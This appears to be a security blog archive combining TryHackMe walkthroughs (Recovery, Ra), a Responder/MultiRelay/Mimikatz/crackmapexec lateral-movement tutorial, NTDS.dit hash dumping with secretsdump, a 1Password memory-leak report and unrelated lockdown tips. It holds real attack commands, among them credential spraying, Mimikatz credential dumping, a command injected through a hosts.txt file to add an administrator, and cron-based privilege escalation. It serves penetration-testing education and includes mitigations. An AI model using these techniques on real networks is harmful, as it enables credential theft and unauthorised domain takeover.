Recovery – TryHackMe Walkthrough

This will be a walkthrough of the weekly challenge “Recovery” from TryHackMe. It was released July 31, 2020.

The Scenario

Hi, it’s me, your friend Alex.

I’m not going to beat around the bush here; I need your help. As you know I work at a company called Recoverysoft. I work on the website side of things, and I setup a Ubuntu web server to run it. Yesterday one of my work colleagues sent me the following email:

Hi Alex,
A recent security vulnerability has been discovered that affects the web server. Could you please run this binary on the server to implement the fix?
Regards
- Teo

Attached was a linux binary called fixutil. As instructed, I ran the binary, and all was good. But this morning, I tried to log into the server via SSH and I received this message:YOU DIDN’T SAY THE MAGIC WORD!YOU DIDN’T SAY THE MAGIC WORD!YOU DIDN’T SAY THE MAGIC WORD!

It turns out that Teo got his mail account hacked, and fixutil was a targeted malware binary specifically built to destroy my webserver!

when I opened the website in my browser I get some crazy nonsense. The webserver files had been encrypted! Before you ask, I don’t have any other backups of the webserver (I know, I know, horrible practice, etc…), I don’t want to tell my boss, he’ll fire me for sure.

Please access the web server and repair all the damage caused by fixutil. You can find the binary in my home directory. Here are my ssh credentials:

Username: alex
Password: madeline

I have setup a control panel to track your progress on port 1337. Access it via your web browser. As you repair the damage, you can refresh the page to receive those “flags” I know you love hoarding.

Good luck!
– Your friend Alex

The Solution

To start, we will attempt to SSH with the given credentials. When doing so, you will see “YOU DIDN’T SAY THE MAGIC WORD!” spamming on the screen. You might remember this from Jurassic Park https://www.youtube.com/watch?v=RfiQYRn7fBg. Another thing you’ll notice is when we terminate this SSH, you see the termination of a while loop.

So there is a file called .bashrc in a user’s profile. .bashrc is a shell script that Bash runs whenever it is started interactively.

We can bypass it a few ways by either running secure shell (sh) or calling bash with the norc flag.

ssh -t username@hostname /bin/sh
ssh -t user@host bash –norc –noprofile

But I went with another way because I was not worried about keeping my .bashrc profile for this challenge

ssh user@host “rm .bashrc”
ssh user@host

At this point, we’ll have Flag 0 which you can check on REMOTEIP:1337.

One thing you’ll notice with the path I chose is that you will get logged out fairly quickly, but that’s fine for now. We’ll figure it out soon. If you look in alex’s home directory, you’ll find a file called “fixutil” which is what the scenario referenced as the malware binary. I copied it over to my Kali instance using scp:

Now, I don’t do too much malware analysis, but I can run strings on it and see if I can get anything. One thing we notice is the while loop being put into the .bashrc file:

We also notice that a root SSH key is added, a new user called “security” is added, and there’s a script called brilliant_script.sh in /opt that is being called by /etc/cron.d/evil. This is being called every minute. We don’t have high enough privileges to do anything about the root SSH key or security user yet, but let’s take a look at that cronjob.

The brilliant_script.sh looks like this:

So, it’s essentially what is killing our sessions >=( . However, we have write access to the file, so let’s stop it from killing our sessions.

What I did was overwrite the script with a “whoami” command that output to a file in my home directory so I could show you that root is what is running the script in the cron.

So not only did we get rid of the code that was kicking us out, we found a privilege escalation vector. Now, I setup a netcat listener and get a reverse shell. From there I change the root password. I can then “su -” in my SSH session and I’m root.

Remote Session
My machine

Now that we’re root, we don’t need the evil script. At this point, we have Flag 1. Then let’s get rid of the security user that was created. This gets us Flag 4. I did not screenshot this 🙂 Lookup how to delete a user or remove the user from /etc/shadow and /etc/passwd.

Let’s get rid of the root ssh key. It’ll be in /root/.ssh/. I just deleted authorized_keys. That gives us Flag 3.

This leaves us with 2 flags left. Let’s take another look at the strings output of fixutil.

As you can see, it moved logging.so to oldliblogging.so. And if you look here, you can see that this is actually the original logging:

So, let’s go back by running this:

This gets us Flag 2 which leaves us with one last flag.

Let’s take a look at this again:

Let’s take a look at the top 3 directories/files.

Well, it looks like the htdocs were encrypted.

And the backup.txt looks like it could be the key. But how do we decrypt?

Well after looking at the fixutil file again, you can see XOR.

So, the next step I took was copy over all the files to my local system.

I then used CyberChef to decrypt the files: https://gchq.github.io/CyberChef/

You can see I used the XOR recipe with the key we got from backup.txt (UTF8) and used it on the files in htdocs. This decrypted the files. I then took the files from the my system and put them back on the remote system.

First, I copied them to Alex’s home folder and then used my root shell to move to the /usr/local/apache2/htdocs/ directory:

This will give us Flag 5. And we’re done. Woot.

Bonus

I went ahead and put the fixutil in ghidra to get the decompiled version of the binary:

Ra – TryHackMe Walkthrough

I’m writing this post as I go through the Ra challenge on TryHackMe. I will try to be as detailed as possible as I’m trying to differentiate from other writeups. I want the reader to learn as much as possible.

Port Scanning

Usually for THM, I stick with the top 1000 ports unless I’m not finding much. This is just a time thing. To be thorough, you’d obviously want to check all ports in a pentest. For now I run “sudo nmap -v -sS IP”

Checking The Website

So, I looked at the website.

One thing that we notice from this screenshot is that there’s a password reset link. But when we try to go to it, we get this:

We can resolve this error by adding fire.windcorp.thm to our hosts file or go directly to this link with the IP address. I went ahead and edited my hosts file (/etc/hosts)

From here, we can click the link and get the reset password page:

We don’t really have usernames or answers to these questions yet, but here are a list of the questions:

Looking further at the main page, we see a quick tidbit about 3 employees

One of these employees “Lily Levesque” has a picture with a dog which could be her favorite pet (a security question). I decided to reverse image search on google to see if we could do some OSINT, but got even luckier when I copied the image location and pasted into Google.

While this was luck (sometimes luck is what you need), I would have eventually seen this if I was just going through the sources of the page which is definitely a step I’d take if I’m not getting anywhere and need to figure out what everything is doing. Also, I would have had to save the picture anyways due to it being in a private THM network and Google wouldn’t have been able to retrieve. This was a slip-up as I’m used to public websites :). Anyways, let’s move forward.

Now, at this point I thought we didn’t have her username and tried stuff like llevesque and l.levesque and lily.levesque and then my brain clicked that it was also in the image name “lilyle”. I went ahead and reset the password.

POST /check.asp HTTP/1.1

Host: fire.windcorp.thm

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://fire.windcorp.thm/reset.asp

Content-Type: application/x-www-form-urlencoded

Content-Length: 40

Connection: close

Cookie: JSESSIONID=node0n5xkn7uovpg3zgps7rsx4x8l29.node0; ASPSESSIONIDQQSCDTTQ=CCEJCFHDGMGKCHAEKENNEINE

Upgrade-Insecure-Requests: 1



username=lilyle&question=3&secret=Sparky

And I got the response:

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/10.0

Date: Fri, 14 Aug 2020 20:01:09 GMT

Connection: close

Content-Length: 1038







<head>



  <meta charset="utf-8">

  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <meta name="description" content="">

  <meta name="author" content="">



  <title>Windcorp.</title>



  <!-- Bootstrap core CSS -->

  <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">



  <!-- Custom fonts for this template -->

  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet">

  <link href="vendor/simple-line-icons/css/simple-line-icons.css" rel="stylesheet" type="text/css">

  <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">



  <!-- Custom styles for this template -->

  <link href="css/landing-page.min.css" rel="stylesheet">



</head>



<body>







<div class="jumbotron" style="height:100vh;">





<h4 class='display-3'>Your password has been reset to: <b>ChangeMe#1234</b><br></h4>Remember to change it after logging in!



  

</div>



</body>

</html>

You can see in this response that the password was changed to “ChangeMe#1234”. Yay!

Using The Credentials

Now where do we sign in? Well, we had other ports open on the system. Let’s try using them on SMB. I tried running CrackMapExec but was not able to login, so I just tried enumerating shares using smbmap.

A share called “Shared” was enumerated and we can see the flag and some executables.

I used smbclient to download these files:

When downloading the .deb I kept running into issues with timeout errors.

I fixed this by adding a timeout (-t)

Now, we can install the .deb file

After running Sparking by typing “spark” into the terminal, you see the UI. So now we know it’s Spark Instant Messenger. We can attempt to login with the same creds we have

Previously if you ran into certificate errors, you might want to check the options in Advanced:

Okay, so we’re authenticated.. Now what? Let’s look up what Spark IM is. After Googling “Spark Instant Messenger exploit” you’ll eventually come across CVE-2020-12772.

When searching for an exploit for CVE-2020-12772, you eventually come across a Github page:

Cool, so now we know we can send something to someone, but to who? Well, on the webpage, there were XMPP links. Let’s choose someone.

Since it shows Buse Candan online, I chose to target them.

Okay, so we know that we need to get the NTLM hash from this user by exploiting the vulnerability found. In order to do this, we’ll use Responder. We’ve used Responder before: https://gameofpwnz.com/responder-multirelay-mimikatz-crackmapexec-windows-pwnage/

We set the -I as “tun0” because we are on the VPN. We then send the payload to Buse:

Now we capture his hash in Responder:

Now that we have a hash, we can crack it. Unfortunately this type of hash is not usable for Pass-The-Hash because it’s Net-NTLMv2 and can’t relay because you are unable to relay from a machine to itself: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

We will try to crack with rockyou.txt since it’s THM and pretty much what is expected. We will be using hashcat mode 2600

The mode is important. If you don’t put the right mode it won’t work.

Looks like we cracked it. Now let’s use it. After toying around with ways to use the credentials, I installed Evil-WinRM so I could use WinRM to login

I then found the 2nd flag in the Desktop. We then see a scripts directory in c:\

When opening the files in the scripts directory, we’ll see a ps1 file is run every minute. If you look at the ps1 file, you’ll see this line:

This takes whatever is in that hosts.txt file in Brittany’s folder and uses Invoke-Expression.

We need to get access to that hosts.txt file. Let’s check what permissions we have and what groups we’re in.

This didn’t get us much.

After looking up all the groups, we can see that Account Operators gives us the ability to alter accounts. https://www.secframe.com/blog/account-operators

We then change BrittanyCR’s password using the net user command:

We can then use smbmap to figure out the shares BrittanyCR has access to:

We can then see we can upload to the hosts.txt file:

Our hosts.txt looks like this:

The leading “;” terminates the command in the ps1 script we found earlier and then we use net user to add gameofpwnz and put them in the Administrators group.

We can verify the GameOfPWNZ user is created:

We then use WinRM to login and cat the admin flag:

And that’s it. We completed this box and got our points.

My Lockdown Tips

I have had the privilege of working from home. If you are new to working from home, let’s chat.

  1. Go through the same routine as if you were going into the office. If you shower, do that. If you drink coffee, do that. Get dressed. Even if you don’t have to webcam for work, it’ll help with productivity.
  2. Establish your work area. It can be rough to bring work home because the separation between your personal life and work becomes a thin line that can go either way. Either you see chores you want to do while working or you allow work to leak over past work hours because you have just a little bit more.
  3. Keep your normal hours. This may be tough if you have others living with you, but try to be consistent. Consistency is key.
  4. Take breaks. Even just a small little sit down on the porch/balcony. You need to breathe. You need to not stay seated all day.
  5. Listen to music. It can feel lonely if you have no sound.
  6. Use your messaging system. Keep in contact with coworkers. Don’t let yourself become too lonely. If your work doesn’t use a chat, use your social media (don’t overdo it).
  7. Establish a “closing” routine. At the end of your work day, create a routine like closing your laptop and having a snack or maybe changing clothes into something more comfortable (similar to when you come home from the office).
  8. Watch your posture. At the office, you have an office chair and a desk. At home, you may be tempted to work a few hours from the couch. Don’t let yourself hunch over too much.

——

For general lockdown,

  1. Use Twitch or YouTube to chat with people. You can stream or watch other streamers. It’ll let you into the life of others quarantined at home and make you feel closer to others.
  2. Utilize FaceTime/Skype/Discord/snapchat to video chat with your friends and family. Even just having it on while you both are doing something can be helpful in taking away the lonely feeling.
  3. Catch up on that series you said you’d watch.
  4. Pick up that video game you thought you’d give a try.
  5. Read a book. Sign up for Audible and listen to books.
  6. Get some rest. We are always in a fast paced life and forget to rest. Allow yourself to be calm. Allow yourself to breathe. Allow yourself to rest.
  7. Make sure to eat your meals. Don’t forget meals. Don’t snack too much all day. Eat like you normally do or use this time to eat better. Learn to cook if you don’t do it often.
  8. Do small workouts at home. You can’t go to the gym but look up body weight exercises. I use the Ring Fit Adventure game while home. It’s fun.
  9. Keep your place clean. A clean space is a more welcoming space. Don’t get lazy while you’re home.
  10. Become Tik Tok famous. lol jk. But it might boost your creativity.
  11. Take up a new hobby like drawing, painting, bead art.
  12. Do Twitch Sings! It’s like karaoke at home with people online.
  13. Download some puzzle apps. It’s good to keep your mind active. And the satisfaction of solving puzzles will help with the positive attitude.
  14. Use the dating app you said you were done with or would never use. I’m not saying you have to go on dates, but learn about someone new. Engage in conversation. Yeah that thing they did in the old days.

That’s what I have for now. If you have any other suggestions, leave them in the comments. If you have any questions, also leave them in the comments or directly message me. We, as a community, will get through this.

SMBv3 Vulnerability ( CVE-2020-0796 )

Yesterday Microsoft and Talos “accidentally” revealed CVE-2020-0796. It appeared and then disappeared, but remnants of the posts were left behind. Microsoft has published an advisory, and it appears the vulnerability is in SMBv3 compression.

Microsoft Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005

Fortinet Post: https://fortiguard.com/encyclopedia/ips/48773

Users are advised to disable SMBv3 & block port 137, 139, 445 inbound/outbound on firewall. Also, make sure you’re logging and monitoring!

Search for the possibly vulnerable servers using the script here:

This will be one to keep an eye out on as everyone believes this to be a “wormable” vulnerability which is already getting coined terms like “EternalBlue-er”, “CoronaBlue”, and “SMBGhost”, and “EternalDarkness.”

I will post more information as it becomes available.

Screenshots and Default Passwords with EyeWitness

EyeWitness

“EyeWitness is designed to take screenshots of websites, RDP services, and open VNC servers, provide some server header info, and identify default credentials if possible.”

https://tools.kali.org/information-gathering/eyewitness

Assumptions:

You’re using Kali Linux

Downloads:

https://github.com/FortyNorthSecurity/EyeWitness

Setup

root@kali:/opt# git clone https://github.com/FortyNorthSecurity/EyeWitness.git
root@kali:/opt# cd EyeWitness/setup
root@kali:/opt/EyeWitness/setup# ./setup.sh

Using a file with hosts (-f)

root@kali:/PATH/TO/HOSTSFILE# python /opt/EyeWitness/EyeWitness.py -f hosts.txt --web

Using an nmap xml file (x)

root@kali:/PATH/TO/NMAP/SCANS# python /opt/EyeWitness/EyeWitness.py -x nmapscan.xml --web

If you want to add more http or https ports, you can use the following:

--add-http-ports 9000, 9001-add-https-ports 9002, 9003

Extra!

You can perform an active scan which will search for common locations of login forms and attempt to use common credentials against those web applications.

--active-scan

Example Output

Performing a Quick Password Audit on NTDS.dit

Assumptions

You’re using the latest Kali OS.
You can contact the Domain Controller.
You have an admin account on the Domain Controller.

What is the NTDS.dit?

“The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.”

Getting a copy of the NTDS.dit

There are many different tools for getting the Ntds.dit file and extracting hashes from it, but this post will be covering one tool. You can check other tools such as VSSAdmin, NinjaCopy, etc.

Impacket

In this blog, I’ll be using Impacket’s secretsdump.py.

If you’re not using Kali, you can install impacket on Linux just using the following:

pip install pyasn1
pip install impacket

Then to dump the password hashes, you can use the following syntax:

secretsdump.py -just-dc-ntlm
<DOMAIN>/<USER>@<DOMAINCONTROLLER> >> ntds.txt

It’ll ask you for the password for that user. This will save the output to ntds.txt.

John The Ripper

You can crack the hashes using wordlists:

john --wordlist=/PATH/TO/WORDLIST /PATH/TO/HASHFILE--pot=FILENAME.pot 

You may have to include the format using the –format.

Wordlists

Here are some good places to get wordlists:

https://hashes.org (LinkedIn Breach, HIBP, etc).

https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

https://github.com/danielmiessler/SecLists/tree/master/Passwords

Responder -> MultiRelay -> Mimikatz -> Crackmapexec ->Windows PWNage

For this post, we’re going to do a scenario-based usage of the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.

This post gained influence from “Skip Cracking Responder Hashes and Replay Them” by Dank Panda (Richard De La Cruz of Tevora).

The Scenario:

We are on the internal network of a Windows domain.
Users are Local Administrators on local workstations.
Domain Administrators have separate admin accounts from their normal accounts, but login with their Domain Administrator account on the same workstation.
We have already scanned the network with NMap and have found the live hosts.
SMB Signing is disabled on workstations
WDigest is on.
LLMNR is enabled.

The Environment:

OS: Windows Server 2008
IP: 10.0.2.15
Services: Active Directory Directory Services, DNS
Logged On Users: kcharles (domain administrator)

OS: Windows 7
IP: 10.0.2.4
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)

OS: Windows 7
IP: 10.0.2.5
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)

OS: Kali Linux
IP: 10.0.2.6
Services: This is our attack machine.
Logged On Users: me 😉

Setting up our attack machine:

Do the usual (eg, apt-get update, apt-get upgrade)
Install crackmapexec: apt-get install crackmapexec

Let’s do this!

First, let’s setup responder. We’ll have to edit the responder settings to turn off HTTP and SMB. In Kali Linux, it can be found here: /usr/share/responder and will be named Responder.conf

We can go ahead and turn responder on. We’ll be using the flags: -I and -rv.

You can see what interface you’re using by using ifconfig:

Alright, now let’s startup responder.

responder -I eth0 -rv

If we wanted to check for machines on the subnet with SMB signing not enabled, we can use RunFinger.py which is in the responder toolset. On Kali Linux, you can find it at:

/usr/share/responder/tools named RunFinger.py

And all you’d do is:

python RunFinger.py -i 10.0.2.0/24

Now, let’s setup MultiRelay.py. This is a tool in the responder toolset. You can find it in Kali Linux at:

/usr/share/responder/tools named MultiRelay.py

We’ll start MultiRelay by pointing it at a target (-t) and using all users (-u ALL).

python MultiRelay.py -t 10.0.2.4 -u ALL

Remember that sleaf and sleafadmin are logged into this Windows 7 machine.

Now, anyone who has used Responder knows that it can take a bit to get any good traffic. We’d be waiting for someone to try to access something we can poison, so for the purpose of this demo, we’re going to have jegghead navigate to a share that doesn’t exist.

You’ll see that responder picks up on this LLMNR and poisons the request.

Now, we’ll see in our MultiRelay.py output that we’ve successfully poisoned the LLMNR request and relayed the hash of jegghead to 10.0.2.4 where she had local administrator. We now have LocalSystem privileges on 10.0.2.4.

From here, we can run commands built-in to this Responder interactive shell. For this demo, we are going to run Mimikatz.

We can do this within the shell by doing: mimi sekurlsa::logonpasswords

Here we get sleaf’s password:

And because sleaf used their admin account on the same machine, we get sleafadmin:

Woot woot. Now, we have the credentials of a domain administrator!

So, now we’ve used responder, multirelay, and mimikatz.

So why don’t we just use these credentials to remote desktop? We could if available. We can do many things. We could use Powershell sessions, wmic, and more but for now, we’ll use crackmapexec since it’s run in memory or items that aren’t often audited or monitored.

This next tool is called crackmapexec and it can be used for many uses, but we’ll focus on a few.

Let’s spray our credentials to find who’s logged in where.

We can do this by pointing crackmapexec at the subnet and passing the creds:

crackmapexec 10.0.2.0/24 -u ‘sleafadmin’ -p ‘P@ssw0rd’ –lusers

This is definitely useful if we know that the user we have compromised has local administrator on all local workstations. Let’s say sleaf was an admin that didn’t login to her admin account on her local workstation. We could use jegghead’s account to spray around the subnet looking for an admin that did.

We could also spray mimikatz trying to get credentials. To show that all you need is local administrator on the machines, we’ll use jegghead’s account. The machines that show “(Pwn3d!)” next to them mean that she’s local administrator on that machine.

crackmapexec 10.0.2.0/24 -u ‘jegghead’ -p ‘1upGirl!’ -M mimikatz

The reason you’re seeing “Waiting on x host(s)” is because the network is slow, but you’ll see jegghead was local administrator on the workstations but not the server.

Now, let’s look at some of the other features.

With the -x switch, we can run commands directly on the machine we target. We’ll be targeting the server (10.0.2.15). We’ll be running a command to ping us (10.0.2.6). I’ll have wireshark up to show the icmp packets coming back to our attack machine.

crackmapexec 10.0.2.15 -u ‘sleafadmin’ -p ‘P@ssw0rd’ -x ‘ping 10.0.2.6’

And here’s the wireshark capture:

So, there we are. A few examples of the usage of crackmapexec.

So in this demo, we’ve used responder, runfinger, multirelay, mimikatz, and crackmapexec.

Why Things Work

Remember our scenario.

Let’s go over some definitions and some quick additional information.

LLMNR (Link-Local Multicast Name Resolution) â€“ This is a protocol based on DNS.  When trying to find a host, a Windows machine will check its host file then DNS and then LLMNR. LLMNR is limited in that it is not routable. This means only machines on the same subnet can use it. Responder essentially waits for a Windows machine to be like “Who’s X?” and Responder will be like “Oh, I’m X.” If successful, the victim will send their NTLM/NTLMv2 hashed credentials to the attacker.

SMB (Server Message Block) â€“ This is an application layer network protocol. This protocol is mostly used for accessing shares and printers. It can run over TCP on port 445 or via NetBIOS UDP Port 137, 138 and TCP ports 137 and 139. It can also run over legacy protocols, but we won’t cover that.

NetBIOS â€“ This  allows apps and computers on a LAN to communicate with network hardware and send data across the network.

NTLM â€“ NT Lan Manager v2 – This is a challenge-response authentication protocol.

Wdigest â€“ This is a protocol for sending cleartext credentials to HTTP and Simple Authentication Security Layer (SASL) applications.

Crackmapexec â€“ This is a post-exploitation tool that allows for connecting and authenticating to multiple hosts at the same time. Everything is either run in memory, use the WinAPI calls or using the built-in Windows features.

Mimikatz â€“ This is a post-exploitation tool that’s known for extracting plaintext passwords, hashes, and kerberos tickets from memory. “Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”

Responder â€“ “A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. “

Mitigations

Now, let’s talk how protect your organization!

  1. Make SMB Signing mandatory. Tools like crackmapexec may be able to turn this off, but you can set up auditing of this registry key so at least you have that measure. Keep in mind that some printers do not support SMB signing and that it might add some network overhead.
  2. Disable Wdigest on older machines. Newer machines (Win8/Win10/Server2k12/Server2k16) should not be vulnerable by default. Enable auditing of the registry key.
  3. Limit who has local administrator on their machines.
  4. Limit where domain administrators can login.

Thanks. If you have any questions, use my contact form or the comments section. Let me know if you liked this post.

Password Manager Vulnerability – 1Password

Let’s give some starter information.

  1. 1Password said the vulnerability was not in scope on BugCrowd.
  2. 1Password said that some researchers have already reported this vulnerability.
  3. Bug was reported on Sunday, October 14, 2018.
  4. AgileBits responded on Wednesday, October 17, 2018. There is currently no fix or signs of them fixing the issue.
  5. Jake Miller (Laconic Wolf) reported a similar vulnerability on Dashlane (https://laconicwolf.com/2018/07/24/password-manager-vulnerability-dashlane/)

GameOfPWNZ identified a vulnerability in the 1Password Windows application. The application leaves passwords including the master password in memory even after the 1Password application has been locked.

GameOfPWNZ signed up for the 1Password Trial located here: https://1password.com/sign-up/

To exploit this vulnerability, an attacker would need to compromise the host machine that the application is on. The application must have been signed into and locked without a reboot to the host machine.

The below screenshots show GameOfPWNZ using Process Hacker to check memory for the process 1Password. The 1Password application was unlocked after system bootup (as a user would do) and used for one of the passwords. The application was then locked and was not unlocked for the rest of the testing (2-3 hours). After about 2-3 hours, GameOfPWNZ checked the memory and was able to obtain the master password as well as the password used during the earlier session.

Steps to Reproduce

  1. Login to 1Password Windows Application.
  2. Use normally
  3. Lock 1Password Windows Application.
  4. Load Process Hacker
  5. Right click 1Password.exe and go to Properties.
  6. Go to the “Memory” tab.
  7. Click on the “Strings…” button.
  8. Keep defaults and press OK.
  9. Click on Filter.
  10. Select Contains.
  11. Enter password to search for (use master password if you want to see master password).

Notes: Host compromise is required. Think about how many users are local admin. My opinion is that this is an issue because a host compromise leads to compromise on social media, banking, etc. I think that wiping the memory after locking the application would be a good remediation for this issue.

Writing A Penetration Test Report

Penetration testing can be fun. You get to PWN all the things. You get to solve puzzles. But when it is all done, it’s time to write the report for the client.

If you’ve never written a penetration test report, this post is for you. What I did is exploited SOME of the vulnerabilities in Metasploitable 2 and created a sample penetration test report.

The sample report: http://gameofpwnz.com/uploads/documents/Metasploitable_Report.docx

Here are some things to make sure you include:

  • Executive Summary (Keep in mind who your audience is)
  • Scope (This should have been determined during pre-engagement)
  • Methods (What is your penetration methodology or formula?)
  • Risk Rating (A risk rating is important in determining which risks need to be mitigated and which could possibly be accepted)
  • Impact (What happens if an attacker exploits the vulnerability?)
  • Remediation (Exploitation is fun, but we need to help the blue team know what the corrective actions would be to mitigate the issue)

Screenshots and steps to reproduce are great for showing the client how you were able to exploit the vulnerability. It also allows the client to check their fixes when they try to reproduce.

This report template is not the actual report template I use in penetration testing, but it’s something I’m willing to share. Feel free to use it. Also, feel free to leave comments about what else you think should be added or any other recommendations.

 

Dislocker USB with Bitlocker (LAB)

This lab will take you through using Dislocker to view data on a USB disk image that has Bitlocker encryption.  The password for Bitlocker will be provided.

 

Real life use: Hard drive with Bitlocker fails to boot.  You need to recover data from it.

 

Bitlocker USB DD image: https://drive.google.com/a/gameofpwnz.com/file/d/0B3KtykBk15nNamdMSVpYaXRPRlU/view?usp=sharing

MD5 Checksum: 90860ff85a78f1421e6f26f44c10b8ae

In Kali, you can use this to get the mount 🙂 :

losetup --partscan --find --show encrypted.001

The Bitlocker Password is password

Use this Procedure: https://gameofpwnz.com/dislocker-recovering-data-from-drive-with-bitlocker-requires-bitlocker-recovery-key-or-password/

The procedure can be altered slightly for this lab.  I used a Kali Linux Virtual Machine instead of a live USB to complete this lab.  In this lab, I use the password rather than the recovery key.  Notice the slight difference in the command when using each.

 

Lab created by @GameOfPWNZ